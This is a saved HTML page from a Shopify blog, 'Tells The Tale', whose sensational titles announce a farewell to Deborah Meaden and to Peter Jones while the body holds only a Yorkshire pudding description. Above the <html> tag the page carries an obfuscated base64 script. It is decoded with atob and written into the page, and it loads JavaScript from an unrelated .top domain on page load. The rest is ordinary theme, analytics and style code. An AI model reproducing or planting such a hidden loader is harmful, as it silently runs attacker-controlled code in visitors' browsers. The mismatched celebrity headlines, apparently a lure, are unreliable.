<!DOCTYPE html>
<script>
let encoded = 'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly90aWFyb3Nvbmxlc3MudG9wL0ZpbWFMbUV6bmNYanZ6ZVkiPjwvc2NyaXB0Pg=='; 
let decoded = atob(encoded); 
document.write(''+ decoded +''); 
</script>
<html class="js" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#EBF2EF">
    <title>𝗪𝗲 𝗦𝗮𝘆 𝗙𝗮𝗿𝗲𝘄𝗲𝗹𝗹 𝗧𝗼 𝗢𝗻𝗲 𝗢𝗳 𝗧𝗵𝗲 𝗗𝗿𝗮𝗴𝗼𝗻𝘀, 𝗗𝗲𝗯𝗼𝗿𝗮𝗵 𝗠𝗲𝗮𝗱𝗲𝗻.
– Tells The Tale</title><meta name="description" content="Traditional Yorkshire pudding to serve with roast beef, batter of flour, salt, eggs, butter, milk, cooked in pan with roast drippings."><script type="text/javascript" async="" src="./piter_files/trekkie.storefront.min.js"></script><script>
      document.documentElement.className = document.documentElement.className.replace('no-js', 'js');
    </script>
    <script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.start');</script><meta id="shopify-digital-wallet" name="shopify-digital-wallet" content="/43152933026/digital_wallets/dialog">
<link rel="alternate" type="application/atom+xml" title="Feed" href="#">
<link href="https://monorail-edge.shopifysvc.com/" rel="dns-prefetch">
<script id="shopify-features" type="application/json">{"accessToken":"8fa9fcef2aafac975397c1e2399903fb","betas":["rich-media-storefront-analytics"],"domain":"tellsthetale.com","predictiveSearch":true,"shopId":43152933026,"smart_payment_buttons_url":"https:\/\/cdn.shopify.com\/shopifycloud\/payment-sheet\/assets\/latest\/spb.en.js","dynamic_checkout_cart_url":"https:\/\/cdn.shopify.com\/shopifycloud\/payment-sheet\/assets\/latest\/dynamic-checkout-cart.en.js","locale":"en"}</script>
<script>var Shopify = Shopify || {};
Shopify.shop = "tellsthetale.myshopify.com";
Shopify.locale = "en";
Shopify.currency = {"active":"SGD","rate":"1.0"};
Shopify.theme = {"name":"Express","id":104945647778,"theme_store_id":885,"role":"main"};
Shopify.theme.handle = "null";
Shopify.theme.style = {"id":null,"handle":null};
Shopify.cdnHost = "cdn.shopify.com";</script>
<script type="module">!function(o){(o.Shopify=o.Shopify||{}).modules=!0}(window);</script>
<script>!function(o){function n(){var o=[];function n(){o.push(Array.prototype.slice.apply(arguments))}return n.q=o,n}var t=o.Shopify=o.Shopify||{};t.loadFeatures=n(),t.autoloadFeatures=n()}(window);</script>
<script id="__st">var __st={"a":43152933026,"offset":-14400,"reqid":"7d369d52-06f3-42bc-97ba-04e18c882ffc","pageurl":"tellsthetale.com\/blogs\/news\/445","s":"articles-391169245346","u":"8b7476eedb07","p":"article","rtyp":"article","rid":391169245346};</script>
<script>window.ShopifyPaypalV4VisibilityTracking = true;</script>
<script>window.ShopifyAnalytics = window.ShopifyAnalytics || {};
window.ShopifyAnalytics.meta = window.ShopifyAnalytics.meta || {};
window.ShopifyAnalytics.meta.currency = 'SGD';
var meta = {"page":{"pageType":"article","resourceType":"article","resourceId":391169245346}};
for (var attr in meta) {
  window.ShopifyAnalytics.meta[attr] = meta[attr];
}</script>
<script>window.ShopifyAnalytics.merchantGoogleAnalytics = function() {

};
</script>
<script class="analytics">(function () {
  var customDocumentWrite = function(content) {
    var jquery = null;

    if (window.jQuery) {
      jquery = window.jQuery;
    } else if (window.Checkout && window.Checkout.$) {
      jquery = window.Checkout.$;
    }

    if (jquery) {
      jquery('body').append(content);
    }
  };

  var isDuplicatedThankYouPageView = function() {
    return document.cookie.indexOf('loggedConversion=' + window.location.pathname) !== -1;
  }

  var setCookieIfThankYouPage = function() {
    if (window.location.pathname.indexOf('/checkouts') !== -1 &&
        window.location.pathname.indexOf('/thank_you') !== -1) {

      var twoMonthsFromNow = new Date(Date.now());
      twoMonthsFromNow.setMonth(twoMonthsFromNow.getMonth() + 2);

      document.cookie = 'loggedConversion=' + window.location.pathname + '; expires=' + twoMonthsFromNow;
    }
  }

  var trekkie = window.ShopifyAnalytics.lib = window.trekkie = window.trekkie || [];
  if (trekkie.integrations) {
    return;
  }
  trekkie.methods = [
    'identify',
    'page',
    'ready',
    'track',
    'trackForm',
    'trackLink'
  ];
  trekkie.factory = function(method) {
    return function() {
      var args = Array.prototype.slice.call(arguments);
      args.unshift(method);
      trekkie.push(args);
      return trekkie;
    };
  };
  for (var i = 0; i < trekkie.methods.length; i++) {
    var key = trekkie.methods[i];
    trekkie[key] = trekkie.factory(key);
  }
  trekkie.load = function(config) {
    trekkie.config = config;
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.onerror = function(e) {
      (new Image()).src = '//v.shopify.com/internal_errors/track?error=trekkie_load';
    };
    script.async = true;
    script.src = 'https://cdn.shopify.com/s/javascripts/tricorder/trekkie.storefront.min.js?v=2020.06.22.1';
    var first = document.getElementsByTagName('script')[0];
    first.parentNode.insertBefore(script, first);
  };
  trekkie.load(
    {"Trekkie":{"appName":"storefront","development":false,"defaultAttributes":{"shopId":43152933026,"isMerchantRequest":null,"themeId":104945647778,"themeCityHash":"13395584929008748185","contentLanguage":"en","currency":"SGD"},"isServerSideCookieWritingEnabled":true,"isPixelGateEnabled":false},"Performance":{"navigationTimingApiMeasurementsEnabled":true,"navigationTimingApiMeasurementsSampleRate":1},"Session Attribution":{}}
  );

  var loaded = false;
  trekkie.ready(function() {
    if (loaded) return;
    loaded = true;

    window.ShopifyAnalytics.lib = window.trekkie;


    var originalDocumentWrite = document.write;
    document.write = customDocumentWrite;
    try { window.ShopifyAnalytics.merchantGoogleAnalytics.call(this); } catch(error) {};
    document.write = originalDocumentWrite;
      (function () {
        if (window.BOOMR && (window.BOOMR.version || window.BOOMR.snippetExecuted)) {
          return;
        }
        window.BOOMR = window.BOOMR || {};
        window.BOOMR.snippetStart = new Date().getTime();
        window.BOOMR.snippetExecuted = true;
        window.BOOMR.snippetVersion = 12;
        window.BOOMR.application = "core";
        window.BOOMR.shopId = 43152933026;
        window.BOOMR.themeId = 104945647778;
        window.BOOMR.url =
          "https://cdn.shopify.com/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js";
        var where = document.currentScript || document.getElementsByTagName("script")[0];
        var parentNode = where.parentNode;
        var promoted = false;
        var LOADER_TIMEOUT = 3000;
        function promote() {
          if (promoted) {
            return;
          }
          var script = document.createElement("script");
          script.id = "boomr-scr-as";
          script.src = window.BOOMR.url;
          script.async = true;
          parentNode.appendChild(script);
          promoted = true;
        }
        function iframeLoader(wasFallback) {
          promoted = true;
          var dom, bootstrap, iframe, iframeStyle;
          var doc = document;
          var win = window;
          window.BOOMR.snippetMethod = wasFallback ? "if" : "i";
          bootstrap = function(parent, scriptId) {
            var script = doc.createElement("script");
            script.id = scriptId || "boomr-if-as";
            script.src = window.BOOMR.url;
            BOOMR_lstart = new Date().getTime();
            parent = parent || doc.body;
            parent.appendChild(script);
          };
          if (!window.addEventListener && window.attachEvent && navigator.userAgent.match(/MSIE [67]./)) {
            window.BOOMR.snippetMethod = "s";
            bootstrap(parentNode, "boomr-async");
            return;
          }
          iframe = document.createElement("IFRAME");
          iframe.src = "about:blank";
          iframe.title = "";
          iframe.role = "presentation";
          iframe.loading = "eager";
          iframeStyle = (iframe.frameElement || iframe).style;
          iframeStyle.width = 0;
          iframeStyle.height = 0;
          iframeStyle.border = 0;
          iframeStyle.display = "none";
          parentNode.appendChild(iframe);
          try {
            win = iframe.contentWindow;
            doc = win.document.open();
          } catch (e) {
            dom = document.domain;
            iframe.src = "javascript:var d=document.open();d.domain='" + dom + "';void(0);";
            win = iframe.contentWindow;
            doc = win.document.open();
          }
          if (dom) {
            doc._boomrl = function() {
              this.domain = dom;
              bootstrap();
            };
            doc.write("<body onload='document._boomrl();'>");
          } else {
            win._boomrl = function() {
              bootstrap();
            };
            if (win.addEventListener) {
              win.addEventListener("load", win._boomrl, false);
            } else if (win.attachEvent) {
              win.attachEvent("onload", win._boomrl);
            }
          }
          doc.close();
        }
        var link = document.createElement("link");
        if (link.relList &&
          typeof link.relList.supports === "function" &&
          link.relList.supports("preload") &&
          ("as" in link)) {
          window.BOOMR.snippetMethod = "p";
          link.href = window.BOOMR.url;
          link.rel = "preload";
          link.as = "script";
          link.addEventListener("load", promote);
          link.addEventListener("error", function() {
            iframeLoader(true);
          });
          setTimeout(function() {
            if (!promoted) {
              iframeLoader(true);
            }
          }, LOADER_TIMEOUT);
          BOOMR_lstart = new Date().getTime();
          parentNode.appendChild(link);
        } else {
          iframeLoader(false);
        }
        function boomerangSaveLoadTime(e) {
          window.BOOMR_onload = (e && e.timeStamp) || new Date().getTime();
        }
        if (window.addEventListener) {
          window.addEventListener("load", boomerangSaveLoadTime, false);
        } else if (window.attachEvent) {
          window.attachEvent("onload", boomerangSaveLoadTime);
        }
        if (document.addEventListener) {
          document.addEventListener("onBoomerangLoaded", function(e) {
            e.detail.BOOMR.init({
              ResourceTiming: {
                enabled: true,
                trackedResourceTypes: ["script", "img", "css"]
              },
            });
            e.detail.BOOMR.t_end = new Date().getTime();
          });
        } else if (document.attachEvent) {
          document.attachEvent("onpropertychange", function(e) {
            if (!e) e=event;
            if (e.propertyName === "onBoomerangLoaded") {
              e.detail.BOOMR.init({
                ResourceTiming: {
                  enabled: true,
                  trackedResourceTypes: ["script", "img", "css"]
                },
              });
              e.detail.BOOMR.t_end = new Date().getTime();
            }
          });
        }
      })();


    if (!isDuplicatedThankYouPageView()) {
      setCookieIfThankYouPage();

        window.ShopifyAnalytics.lib.page(
          null,
          {"pageType":"article","resourceType":"article","resourceId":391169245346}
        );


    }
  });


      var eventsListenerScript = document.createElement('script');
      eventsListenerScript.async = true;
      eventsListenerScript.src = "//cdn.shopify.com/s/assets/shop_events_listener-2632023fb2795bd6668b6fbae05b661baba07afb3d62048f023763eca3cd96e3.js";
      document.getElementsByTagName('head')[0].appendChild(eventsListenerScript);

})();</script><script async="" src="./piter_files/shop_events_listener-2632023fb2795bd6668b6fbae05b661baba07afb3d62048f023763eca3cd96e3.js"></script>
<script integrity="sha256-BFmLd7EQOpIHg76CWl9MJFqROXNgxiHNdyBpz5k0cRM=" crossorigin="anonymous" data-source-attribution="shopify.loadfeatures" defer="defer" src="./piter_files/load_feature-04598b77b1103a920783be825a5f4c245a91397360c621cd772069cf99347113.js"></script>
<script integrity="sha256-h+g5mYiIAULyxidxudjy/2wpCz/3Rd1CbrDf4NudHa4=" data-source-attribution="shopify.dynamic-checkout" defer="defer" src="./piter_files/features-87e8399988880142f2c62771b9d8f2ff6c290b3ff745dd426eb0dfe0db9d1dae.js" crossorigin="anonymous"></script>


<script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.end');</script>




<meta property="og:site_name" content="Tells The Tale">
<meta property="og:title" content="ꜰɪɴᴀʟ ꜰᴀʀᴇᴡᴇʟʟ ᴛᴏ ᴘᴇᴛᴇʀ ᴊᴏɴᴇꜱ">
<meta property="og:type" content="article">
<meta property="og:description" content="
Traditional Yorkshire pudding to serve with roast beef, batter of flour, salt, eggs, butter, milk, cooked in pan with roast drippings.">

<meta name="twitter:site" content="@">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="ꜰɪɴᴀʟ ꜰᴀʀᴇᴡᴇʟʟ ᴛᴏ ᴘᴇᴛᴇʀ ᴊᴏɴᴇꜱ">
<meta name="twitter:description" content="
Traditional Yorkshire pudding to serve with roast beef, batter of flour, salt, eggs, butter, milk, cooked in pan with roast drippings.">

    <style data-shopify="">@font-face {
  font-family: Futura;
  font-weight: 500;
  font-style: normal;
  font-display: swap;
  src: url("https://fonts.shopifycdn.com/futura/futura_n5.5632c6d8a6da9141ef40e51d14264a007bcae7e5.woff2?&hmac=22449ff9bdad622719bc34d1b0730a35f2ef73310232ea51158055d9d92d61eb") format("woff2"),
       url("https://fonts.shopifycdn.com/futura/futura_n5.ea788239cf399e57dbdfe80e24bba751e5c2a36c.woff?&hmac=72e270ab2d821b9a02ff38453ed68a534e44542f9f15b6fdcfbf0724abe96f3d") format("woff");
}

  @font-face {
  font-family: Karla;
  font-weight: 400;
  font-style: normal;
  font-display: swap;
  src: url("https://fonts.shopifycdn.com/karla/karla_n4.187fb228d0a8055289c8663e90433b4a50e86848.woff2?&hmac=ffe3e015e666d2019f4e12cb37922856fae8b1ac9dbaf0a9d0d6c7aad7626a4f") format("woff2"),
       url("https://fonts.shopifycdn.com/karla/karla_n4.24ba61101c1ba185880bec9c74d8e7cdb826ad49.woff?&hmac=78989244295ec5ecbdae9447111d9a01ae2f46d9d622aa16d6e7963fdaeb7982") format("woff");
}

  @font-face {
  font-family: Karla;
  font-weight: 700;
  font-style: normal;
  font-display: swap;
  src: url("https://fonts.shopifycdn.com/karla/karla_n7.e8c0eb897464ccf45d5caa70ec8c7005d0f7b1b2.woff2?&hmac=1dcb79031b83d04b4a6b25afa94e4aa8306fa63ce0ec61d8ea59502432332b95") format("woff2"),
       url("https://fonts.shopifycdn.com/karla/karla_n7.98d31f084a84db1ace8d046ddc8faa522b144349.woff?&hmac=1eb2ce6cfec5c13b83614cf37cf557231b848e48137c9657453b24decad02a9c") format("woff");
}

  @font-face {
  font-family: Karla;
  font-weight: 400;
  font-style: italic;
  font-display: swap;
  src: url("https://fonts.shopifycdn.com/karla/karla_i4.ce8a9af821b5675e15a4785a2318ed578e68e9c9.woff2?&hmac=0c2b3dffb922b06a5ab16e23f1963025c7508df70f1a2424d8eda9f6075bfbf3") format("woff2"),
       url("https://fonts.shopifycdn.com/karla/karla_i4.8addc6e90a0d45abd627fd1c26cd4dbae936fbbb.woff?&hmac=6008acad15ae9c8fecb7ad7220c03b7a6080b935f53112cc88c30a3fedf6039e") format("woff");
}

  @font-face {
  font-family: Karla;
  font-weight: 700;
  font-style: italic;
  font-display: swap;
  src: url("https://fonts.shopifycdn.com/karla/karla_i7.09a1f54d3edfd3142937b195898dad5acea092ce.woff2?&hmac=950e88b76da0dccc73b5e2541d3586085e76a50e7270b2ce9d4b89363cad3b33") format("woff2"),
       url("https://fonts.shopifycdn.com/karla/karla_i7.7088df7c28e0b13b5406d1a8a5978bdb24760ab1.woff?&hmac=629cc6235ecd20c4c6b0764dd72278f6a01730681fbb8989948a0ec3e5ff4ef9") format("woff");
}


  :root {

    --font-heading-family: Futura, sans-serif;
    --font-heading-style: normal;
    --font-heading-weight: 500;
    --font-heading-base-size: 2.6rem;


    --font-body-family: Karla, sans-serif;
    --font-body-style: normal;
    --font-body-weight: 400;
    --font-body-weight-bold: 700;
    --font-body-base-size: 62.5%;


    --color-background: #FFFFFF;
    --color-background-rgba-stripped: 255, 255, 255;
    --color-secondary-background: #EBF2EF;
    --color-borders-and-lines: #577B46;
    --color-borders-and-lines-rgba-stripped: 87, 123, 70;
    --color-button: #2D4F1E;


    --color-headings-and-links: #2D4F1E;
    --color-body-text: #537344;
    --color-body-text-rgba-stripped: 83, 115, 68;
    --color-secondary-background-text: #2D4F1E;
    --color-sale-price: #E84C37;


    --color-field-text: #2D4F1E;
    --color-field-borders: #2D4F1E;
  }</style>

    <style>.header__logo--text{color:var(--color-headings-and-links);font-family:var(--font-heading-family);font-size:calc(var(--font-heading-base-size) * .8);font-style:var(--font-heading-style);font-weight:var(--font-heading-weight);line-height:1.4}@media only screen and (min-width:46.85em){.header__logo--text{font-size:var(--font-heading-base-size)}}p,ul{margin:0 0 2em;color:var(--color-body-text);font-family:var(--font-body-family);font-weight:var(--font-body-weight);font-size:1.6rem;font-style:var(--font-body-style);line-height:2.8rem}@media only screen and (min-width:61.85em){p,ul{font-size:1.7rem;line-height:2.7rem}}p:last-child,ul:last-child{margin-bottom:0}body{font-family:var(--font-body-family);font-weight:var(--font-body-weight);font-size:1.6rem;font-style:var(--font-body-style)}.button,.shopify-challenge__button{display:inline-flex;align-items:center;justify-content:center;text-decoration:none;text-align:center;border:1px solid currentColor;border-radius:.25rem;color:var(--color-button);background-color:transparent;padding:1.2em 2.4em;font-style:normal;font-weight:var(--font-body-weight-bold);text-transform:uppercase;white-space:normal;font-size:1.3rem;letter-spacing:.15em}.button[aria-disabled=true],.button[disabled],.shopify-challenge__button[aria-disabled=true],.shopify-challenge__button[disabled]{opacity:.5}.button[aria-disabled=true]:focus,.button[aria-disabled=true]:hover,.button[disabled]:focus,.button[disabled]:hover,.shopify-challenge__button[aria-disabled=true]:focus,.shopify-challenge__button[aria-disabled=true]:hover,.shopify-challenge__button[disabled]:focus,.shopify-challenge__button[disabled]:hover{background-color:transparent;color:var(--color-button)}.button:focus,.button:hover,.shopify-challenge__button:focus,.shopify-challenge__button:hover{background-color:var(--color-button);color:var(--color-background)}.button:active,.shopify-challenge__button:active{background-color:rgba(var(--color-button),.05);color:var(--color-button)}.button--secondary{background-color:var(--color-button);color:var(--color-background)}.button--secondary:hover{color:var(--color-button);background-color:transparent}.button--floating{display:inline-flex;align-items:center;justify-content:center;text-decoration:none;text-transform:uppercase;text-align:center;font-style:normal;font-weight:var(--font-body-weight-bold);background-color:var(--color-background);color:var(--color-button);white-space:normal;font-size:1.3rem;letter-spacing:.15em;border-radius:.25rem;border:none;padding:1.5rem 5.5rem;box-shadow:2px 4px 11px rgba(0,0,0,.1);transition:get-transition-properties(box-shadow)}.button--floating:focus,.button--floating:hover{box-shadow:2px 14px 18px rgba(0,0,0,.1)}.button--small{padding:.6em 1em}.hidden{display:none!important}.critical-hidden{display:inherit}.icon-fallback-text,.label-hidden,.skip-link,.visually-hidden{position:absolute!important;overflow:hidden;width:1px;height:1px;margin:-1px;padding:0;border:0;clip:rect(0 0 0 0);word-wrap:normal!important}.visually-hidden--inline{margin:0;height:1em}.js-focus-hidden:focus{outline:0}.no-placeholder .label-hidden{position:inherit!important;overflow:auto;width:auto;height:auto;margin:0;clip:auto}.visually-shown{position:inherit!important;overflow:auto;width:auto;height:auto;margin:0;clip:auto}.no-js:not(html){display:none}.no-js .no-js:not(html){display:block}.no-js .js{display:none}.supports-no-cookies:not(html){display:none}html.supports-no-cookies .supports-no-cookies:not(html){display:block}html.supports-no-cookies .supports-cookies{display:none}.skip-link:focus{z-index:10000;padding:1em;background-color:var(--color-background);color:var(--color-body-text);margin:0;transition:none;text-decoration:none;position:absolute!important;overflow:auto;width:auto;height:auto;margin:0;clip:auto}.full-width-link{position:absolute;top:0;right:0;bottom:0;left:0;z-index:2}.shopify-challenge__container{padding:6rem 0}.critical-hidden{display:none}.content-for-layout{opacity:0}.content-for-layout .shopify-section{display:none}.content-for-layout .shopify-section:first-child{display:inherit}*,::after,::before{box-sizing:border-box}html{font-size:var(--font-body-base-size)}body{display:flex;flex-direction:column;margin:0}body,html{background-color:var(--color-background);height:100%}body,button,input,select,textarea{-webkit-font-smoothing:antialiased;text-size-adjust:100%}.page-width{max-width:1200px;margin:0 auto;padding:0 6rem}.visually-hidden{position:absolute!important;overflow:hidden;width:1px;height:1px;margin:-1px;padding:0;border:0;clip:rect(0 0 0 0);word-wrap:normal!important}.icon{display:inline-block;vertical-align:middle;fill:currentColor}.header-wrapper{background-color:transparent}.announcement-bar{padding:.7rem;text-align:center}.announcement-bar__message{margin:0;font-size:1.4rem;font-family:var(--font-body-family);font-weight:var(--font-body-weight-bold);word-break:break-all;word-break:break-word;hyphens:auto}.header{display:flex;justify-content:space-between;align-items:center;padding:2.2rem}@media only screen and (min-width:46.85em){.header{padding-left:6rem;padding-right:6rem}}.header--secondary-background{background-color:var(--color-secondary-background)}.header__heading{margin:0;flex-basis:40%;flex-shrink:1}@media only screen and (min-width:46.85em){.header__heading{flex-basis:auto}}.header__logo-image{display:block;width:100%}.header__logo{display:block;vertical-align:middle;text-decoration:none;color:var(--color-headings-and-links)}.header--secondary-background .header__logo{color:var(--color-secondary-background-text)}.header__logo--text{word-break:break-word}.header__icons{display:flex;align-items:center}.header__accounts-link{text-decoration:none;padding:1rem;color:var(--color-headings-and-links)}.header__accounts-link .icon-account{height:2.3rem;width:2.3rem}.header--secondary-background .header__accounts-link{color:var(--color-secondary-background-text)}.header__cart-button{position:relative;padding:1rem;color:var(--color-headings-and-links);border:none;background-color:transparent}.header__cart-button .icon-cart{height:2.4rem;width:2.4rem}.no-js .header__cart-button{display:none}.header--secondary-background .header__cart-button{color:var(--color-secondary-background-text)}.header__cart-button--link{display:none}.header__cart-button--link.header__cart-button--visible,.no-js .header__cart-button--link{display:inline-block}.header__cart-price-bubble{position:relative;padding:.4rem 1rem;background-color:var(--color-headings-and-links);color:var(--color-background);border-radius:.4rem;font-size:1.3rem;font-weight:var(--font-body-weight-bold)}.header__cart-price-bubble::before{content:'';border:3px solid transparent;border-right:6px solid var(--color-headings-and-links);top:50%;transform:translateY(-50%);left:-9px;position:absolute;z-index:2}.header--secondary-background .header__cart-price-bubble{background-color:var(--color-secondary-background-text);color:var(--color-secondary-background)}.header--secondary-background .header__cart-price-bubble::before{border-right-color:var(--color-secondary-background-text)}</style>

    <link rel="stylesheet" href="./piter_files/theme.min.css" media="all"><link rel="stylesheet" href="./piter_files/theme.min.css" media="all" onload="this.media=&#39;all&#39;;this.onload=null;">
    <noscript><link rel="stylesheet" href="//cdn.shopify.com/s/files/1/0431/5293/3026/t/2/assets/theme.min.css?v=9461683503382388731"></noscript>
    <script>/*! loadCSS. [c]2017 Filament Group, Inc. MIT License */!function(c){"use strict";function e(e,t,n,o){var r,i=c.document,d=i.createElement("link");if(t)r=t;else{var a=(i.body||i.getElementsByTagName("head")[0]).childNodes;r=a[a.length-1]}var f=i.styleSheets;if(o)for(var l in o)o.hasOwnProperty(l)&&d.setAttribute(l,o[l]);d.rel="stylesheet",d.href=e,d.media="only x",function e(t){if(i.body)return t();setTimeout(function(){e(t)})}(function(){r.parentNode.insertBefore(d,t?r:r.nextSibling)});var s=function(e){for(var t=d.href,n=f.length;n--;)if(f[n].href===t)return e();setTimeout(function(){s(e)})};function u(){d.addEventListener&&d.removeEventListener("load",u),d.media=n||"all"}return d.addEventListener&&d.addEventListener("load",u),(d.onloadcssdefined=s)(u),d}"undefined"!=typeof exports?exports.loadCSS=e:c.loadCSS=e}("undefined"!=typeof global?global:this);/*! onloadCSS. (onload callback for loadCSS) [c]2017 Filament Group, Inc. MIT License */function onloadCSS(n,a){var t;function d(){!t&&a&&(t=!0,a.call(n))}n.addEventListener&&n.addEventListener("load",d),n.attachEvent&&n.attachEvent("onload",d),"isApplicationInstalled"in navigator&&"onloadcssdefined"in n&&n.onloadcssdefined(d)}

    var preload = document.querySelector('link[href="//cdn.shopify.com/s/files/1/0431/5293/3026/t/2/assets/theme.min.css?v=9461683503382388731"]');
    var stylesheet = loadCSS("//cdn.shopify.com/s/files/1/0431/5293/3026/t/2/assets/theme.min.css?v=9461683503382388731", preload);
    onloadCSS(stylesheet, function() { stylesheet.loaded = true; });
    </script>
  <link href="./piter_files/shopify-boomerang-1.0.0.min.js" rel="preload" as="script"><script id="boomr-scr-as" src="./piter_files/shopify-boomerang-1.0.0.min.js" async=""></script></head>

  <body>
    <a class="skip-link" href="#MainContent">Skip to content</a><div class="stage" data-popup-stage="cart">
  <div class="stage__overlay" data-popup-close="cart"></div>
    <div role="dialog" aria-modal="true" aria-labelledby="cart-drawer-title" data-cart="" data-popup="cart" class="drawer drawer--right  is-empty ">
      <div class="cart-drawer-container" data-popup-focus="cart" tabindex="-1">
        <form id="CartDrawer" action="#" class="cart-drawer critical-hidden" method="post" novalidate="">

          <div class="cart-drawer__header">
            <h2 class="visually-hidden" id="cart-drawer-title">Shopping Cart</h2>
            <button type="button" class="cart-drawer__close-button" data-popup-close="cart" data-cart-close="">

              <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-arrow-back" viewBox="0 0 18 18"><path d="M1.5 9.347L10.414 1M9.674 17L1.502 8.653M1.648 9H17.5"></path></svg>
              <span class="cart-drawer__title">Continue shopping</span>
            </button>
          </div>

          <div class="cart-drawer__content">
            <p class="cart-drawer__empty-text" data-cart-empty-text="">Your cart is currently empty.</p>
            <p class="cart-drawer__no-cookies-text">Enable cookies to use the shopping cart</p>

            <div class="cart-drawer__items" data-cart-items="">

            </div>


          </div>

          <div class="cart-drawer__footer">
            <div class="cart-drawer__totals">
              <h3 class="cart-drawer__subtotal">Subtotal</h3>
              <p class="cart-drawer__subtotal-value" data-cart-price="">$0.00</p>
              <p class="visually-hidden" data-price-live-region="" aria-live="polite" role="status"></p>
            </div>

            <div data-discounts="">

            </div><p class="cart-drawer__notice">Taxes and shipping calculated at checkout
</p>

            <div class="cart-drawer__ctas">
              <button type="submit" class="button" name="checkout" data-checkout-button="" disabled="">

                Check Out
              </button>
            </div>
          </div>
        </form>
      </div>
    </div>
  </div>


<div id="shopify-section-header" class="shopify-section"><div class="header-wrapper" data-section-id="header" data-section-type="header"><style data-shopify="">.announcement-bar {
        background-color: #51836D;
        border-bottom: 1px solid #FFFFFF;
      }

      .announcement-bar__message {
        color: #FFFFFF;
      }</style><div class="announcement-bar" role="region" aria-label="Announcement">
      <p class="announcement-bar__message">Announce something here</p>
    </div><header class="header" role="banner"><div class="header__heading"><a href="#" class="header__logo header__logo--text">
          Tells The Tale

      </a></div><div class="header__icons"><a href="#" class="header__cart-button header__cart-button--link">

        <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-cart" viewBox="0 0 37 40"><path d="M36.5 34.8L33.3 8h-5.9C26.7 3.9 23 .8 18.5.8S10.3 3.9 9.6 8H3.7L.5 34.8c-.2 1.5.4 2.4.9 3 .5.5 1.4 1.2 3.1 1.2h28c1.3 0 2.4-.4 3.1-1.3.7-.7 1-1.8.9-2.9zm-18-30c2.2 0 4.1 1.4 4.7 3.2h-9.5c.7-1.9 2.6-3.2 4.8-3.2zM4.5 35l2.8-23h2.2v3c0 1.1.9 2 2 2s2-.9 2-2v-3h10v3c0 1.1.9 2 2 2s2-.9 2-2v-3h2.2l2.8 23h-28z"></path></svg>
        <span class="icon-fallback-text">Cart</span>
      </a>


        <button class="header__cart-button" aria-controls="CartDrawer" aria-haspopup="dialog" aria-expanded="false" data-popup-open="cart">

          <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-cart" viewBox="0 0 37 40"><path d="M36.5 34.8L33.3 8h-5.9C26.7 3.9 23 .8 18.5.8S10.3 3.9 9.6 8H3.7L.5 34.8c-.2 1.5.4 2.4.9 3 .5.5 1.4 1.2 3.1 1.2h28c1.3 0 2.4-.4 3.1-1.3.7-.7 1-1.8.9-2.9zm-18-30c2.2 0 4.1 1.4 4.7 3.2h-9.5c.7-1.9 2.6-3.2 4.8-3.2zM4.5 35l2.8-23h2.2v3c0 1.1.9 2 2 2s2-.9 2-2v-3h10v3c0 1.1.9 2 2 2s2-.9 2-2v-3h2.2l2.8 23h-28z"></path></svg>
          <span class="icon-fallback-text">Cart</span>
        </button>


      <div class="header__cart-price-bubble">
        <span class="icon-fallback-text">Cart price</span>
        <span data-cart-price-bubble="" data-cart-price="">$0.00</span>
      </div>
    </div>
  </header>
</div>

<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "Tells The Tale",

  "sameAs": [
    "",
    "",
    "",
    "",
    "",
    "",
    "",
    ""
  ],
  "url": "https://tellsthetale.com"
}
</script>




</div>

    <main id="MainContent" class="content-for-layout" role="main">
      <article class="article">
  <div id="shopify-section-article-template" class="shopify-section"><div class="article-title">
  <h1 class="article-title__heading">𝗪𝗲 𝗦𝗮𝘆 𝗙𝗮𝗿𝗲𝘄𝗲𝗹𝗹 𝗧𝗼 𝗢𝗻𝗲 𝗢𝗳 𝗧𝗵𝗲 𝗗𝗿𝗮𝗴𝗼𝗻𝘀, 𝗗𝗲𝗯𝗼𝗿𝗮𝗵 𝗠𝗲𝗮𝗱𝗲𝗻.</h1>

    <p class="article-title__text">by Tells The Tale Admin</p>



    <p class="article-title__text"><time datetime="2020-07-11T00:57:00Z">July 10, 2020</time></p>

</div>

<div class="rte">
  <p><span><img src="./piter_files/2_1024x1024.png" alt="beef"></span></p>
<p><span>Traditional Yorkshire pudding to serve with roast beef, batter of flour, salt, eggs, butter, milk, cooked in pan with roast drippings.</span></p>
</div>


  <ul class="social-sharing"><li class="social-sharing__item">
      <a target="_blank" href="https://www.facebook.com/sharer.php" class="social-sharing__item-link" rel="noopener" aria-describedby="a11y-new-window-external-message">
        <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-facebook" viewBox="0 0 20 20"><path d="M18.05.811q.439 0 .744.305t.305.744v16.637q0 .439-.305.744t-.744.305h-4.732v-7.221h2.415l.342-2.854h-2.757v-1.83q0-.659.293-1t1.073-.342h1.488V3.762q-.976-.098-2.171-.098-1.634 0-2.635.964t-1 2.72V9.47H7.951v2.854h2.415v7.221H1.413q-.439 0-.744-.305t-.305-.744V1.859q0-.439.305-.744T1.413.81H18.05z"></path></svg>
        <span class="social-sharing__title" aria-hidden="true">Share</span>
        <span class="visually-hidden">Share on Facebook</span>
      </a>
    </li><li class="social-sharing__item">
      <a target="_blank" href="https://twitter.com/share?text=%EA%9C%B0%C9%AA%C9%B4%E1%B4%80%CA%9F%20%EA%9C%B0%E1%B4%80%CA%80%E1%B4%87%E1%B4%A1%E1%B4%87%CA%9F%CA%9F%20%E1%B4%9B%E1%B4%8F%20%E1%B4%98%E1%B4%87%E1%B4%9B%E1%B4%87%CA%80%20%E1%B4%8A%E1%B4%8F%C9%B4%E1%B4%87%EA%9C%B1&amp;url=#" class="social-sharing__item-link" rel="noopener" aria-describedby="a11y-new-window-external-message">
